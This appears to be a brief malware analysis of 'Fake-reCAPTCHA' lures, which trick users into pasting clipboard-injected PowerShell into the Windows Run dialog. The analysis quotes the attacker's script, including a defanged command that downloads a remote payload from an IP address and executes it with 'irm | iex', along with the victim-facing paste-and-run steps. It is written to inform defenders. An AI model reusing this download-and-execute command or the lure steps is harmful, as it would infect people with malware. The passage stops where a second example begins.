Analysis Malicious reCAPTCHA

 

Cyber attackers are always looking for new ways to attack. We have analyzed many different scripts, files and techniques in the past. But this time we will analyze a new technique and method of attackers known as Fake-reCAPTCHA. In fact, we first need to know what is Captcha ? CAPTCHA, which stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart, is a security measure used to distinguish between human users and automated bots. It presents a challenge that is easy for humans to solve but difficult for computers. However, attackers have counterfeited this technique through a technique. First, they create a fake captcha and through the use of some JavaScript code, Automatic copies the malicious PowerShell code and tells you the steps on how to infect yourself with the malware! . . . . As clearly shown in the figure below :

Infection Process by Malware Developer :

to complete the verification steps shown in the image:

1. Press & hold Windows Key + R :  This opens the Run dialog box in Windows.

2. Press Ctrl + V in the verification window : This likely pastes a verification string or ID (e.g., "reCAPTCHA Verification ID: 6467") into the Run dialog or a related prompt.

3. Press Enter : This executes the command or input, completing the verification process.

Malicious Powershell Code :

 Set objShell = CreateObject("WScript.Shell")

        objShell.Run "taskkill /IM KjGryNSu.exe", 0

        objShell.Run "powershell -c irm http[://]185.100.157.217[:85]/opencaptcha[.txt] | iex", 0, False

        objShell.Run "powershell.exe Write-Output 'Checking you are robot?'; Start-Sleep -Seconds 5; echo 'Verification status: ERROR'; Start-Sleep -Seconds 5", 1, False

        ClearClipboard 

In another example Malware Developer encoded the malicious powershell code with charcode :